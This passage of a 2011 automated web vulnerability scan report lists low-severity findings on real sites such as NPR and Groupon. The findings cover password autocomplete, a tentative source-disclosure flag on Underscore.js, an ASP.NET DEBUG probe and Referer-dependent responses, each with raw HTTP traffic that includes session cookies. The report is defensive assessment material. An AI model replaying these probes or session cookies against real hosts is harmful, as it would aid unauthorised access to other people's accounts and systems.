Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. http://shop.npr.org/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.npr.org
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?p=login&ua=user_start_checkout HTTP/1.1
Host: shop.npr.org
Proxy-Connection: keep-alive
Referer: http://shop.npr.org/index.php?p=cart
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; ShoppingCartSession=dd4agnd4un1d3jrdith74nh772; __utmz=28031614.1304955581.1.1.utmcsr=topnav|utmccn=topnav|utmcmd=topnav; s_cc=true; s_sq=nprorg%3D%2526pid%253DCommunity%25253ANPR.org%252520Registration%2526pidt%253D1%2526oid%253Djavascript%25253Avoid%2525280%252529%25253B%2526ot%253DA; __utma=28031614.1626637707.1304955581.1304955581.1304955581.1; __utmc=28031614; __utmb=28031614.4.10.1304955581

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:43:29 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19848

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</p>
<form action="https://shop.npr.org/index.php?pcsid=dd4agnd4un1d3jrdith74nh772&p=login" method="post" onsubmit="return CheckLoginForm(this)">
<input type="hidden" name="ua" value="user_login" />
...[SNIP]...
</label>
<input id="inputPassword" maxlength="36" type="password" name="password" value=""/>
</div>
...[SNIP]...

12.2. https://www.groupon.com/login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<div class='page_content'>
<form action="/session" class="default" id="new_session" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label><input class="grid_5 input" id="session_password" name="session[password]" size="30" type="password" /><span class="caption">
...[SNIP]...

12.3. https://www.groupon.com/users/new  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<div class='grid_6'>
<form action="/users" class="default" id="new_user" method="post"><div style="margin:0;padding:0">
...[SNIP]...
</label><input class="input" id="user_password" name="user[password]" size="30" type="password" /></div>
...[SNIP]...
</label><input class="input" id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" /></div>
...[SNIP]...

12.4. http://www.npr.org/templates/reg/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /templates/reg/ HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:39:46 GMT
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 09 May 2011 15:39:46 GMT
Age: 0
Content-Length: 44210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Registration<
...[SNIP]...
</script>

<form id="createaccount" action="https://www.npr.org/templates/reg/index-submit.php" method="post">
<input type="hidden" name="ref" value="" />
...[SNIP]...
</label>
<input type="password" name="public_user_password" id="pwd" value=""/> <span class="pwdtxt">
...[SNIP]...
</label>
<input type="password" name="public_user_password_confirm" id="rpwd" value=""/>
</p>
...[SNIP]...

12.5. http://www.npr.org/templates/reg/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/reg/login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /templates/reg/login.php HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:39:48 GMT
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 16829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Log in</title
...[SNIP]...
</div>
<form id="loginForm" action="https://www.npr.org/templates/reg/login-submit.php" method="post">
<input type="hidden" name="ref" value="" />
...[SNIP]...
</label>
<input class="textbox" type="password" name="public_user_password" id="password" value="" />
<a href="/templates/reg/forgot-password.php" class="forgot">
...[SNIP]...

12.6. http://www.therepublic.com/login/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FreakAuth=423b87089976e0474ec7fcf078c4204a; __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html
Content-Length: 24003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/process/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/>&nbsp<a href="./login/forgot/">
...[SNIP]...

12.7. http://www.therepublic.com/login/register/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /login/register/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /login/register/ HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 25776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The Republic -
...[SNIP]...
</p>
<form id="login" method="post" action="./login/reg_step1_sub/">
   <p>
...[SNIP]...
</span><input type="password" name="login_password" id="login_password" size="30"/></p>
...[SNIP]...
</span><input type="password" name="login_password_rep" id="login_password_rep" size="30"/></p>
...[SNIP]...

13. Source code disclosure  previous  next
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


13.1. http://assets1.grouponcdn.com/assets/application.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://assets1.grouponcdn.com
Path:   /assets/application.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /assets/application.js?OxIWiUVz HTTP/1.1
Host: assets1.grouponcdn.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Cache-Control: max-age=315360000
Cache-Control: public
Age: 44487
Date: Mon, 09 May 2011 15:35:51 GMT
Last-Modified: Mon, 09 May 2011 03:12:25 GMT
Expires: Thu, 06 May 2021 03:27:02 GMT
Connection: keep-alive
Content-Length: 128578

// Underscore.js 1.1.4
// (c) 2011 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed f
...[SNIP]...
+ id : id;
};

// By default, Underscore uses ERB-style template delimiters, change the
// following template settings to use alternative delimiters.
_.templateSettings = {
evaluate : /<%([\s\S]+?)%>/g,
interpolate : /<%=([\s\S]+?)%>/g
};

// JavaScript micro-templating, similar to John Resig's implementation.
// Underscore templating handles arbitrary delimiters, preserves whitespace,
// and correctly escapes quotes withi
...[SNIP]...

13.2. http://assets1.grouponcdn.com/assets/subscriptions.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://assets1.grouponcdn.com
Path:   /assets/subscriptions.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /assets/subscriptions.js?kWgEDV5U HTTP/1.1
Host: assets1.grouponcdn.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
Cache-Control: max-age=315360000
Cache-Control: public
Age: 44397
Date: Mon, 09 May 2011 15:35:37 GMT
Last-Modified: Mon, 09 May 2011 03:12:25 GMT
Expires: Thu, 06 May 2021 03:27:07 GMT
Connection: keep-alive
Content-Length: 66178

// Underscore.js 1.1.4
// (c) 2011 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed f
...[SNIP]...
+ id : id;
};

// By default, Underscore uses ERB-style template delimiters, change the
// following template settings to use alternative delimiters.
_.templateSettings = {
evaluate : /<%([\s\S]+?)%>/g,
interpolate : /<%=([\s\S]+?)%>/g
};

// JavaScript micro-templating, similar to John Resig's implementation.
// Underscore templating handles arbitrary delimiters, preserves whitespace,
// and correctly escapes quotes withi
...[SNIP]...

14. ASP.NET debugging enabled  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://usata1.gcion.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

Request

DEBUG /Default.aspx HTTP/1.0
Host: usata1.gcion.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Mon, 09 May 2011 15:36:56 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="usata1.gcion.com"
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15. Referer-dependent response  previous  next
There are 9 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



15.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttri
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Connection: close
Content-Type: text/html


15.2. http://480-adver-view.c3metrics.com/v.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Request 1

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html

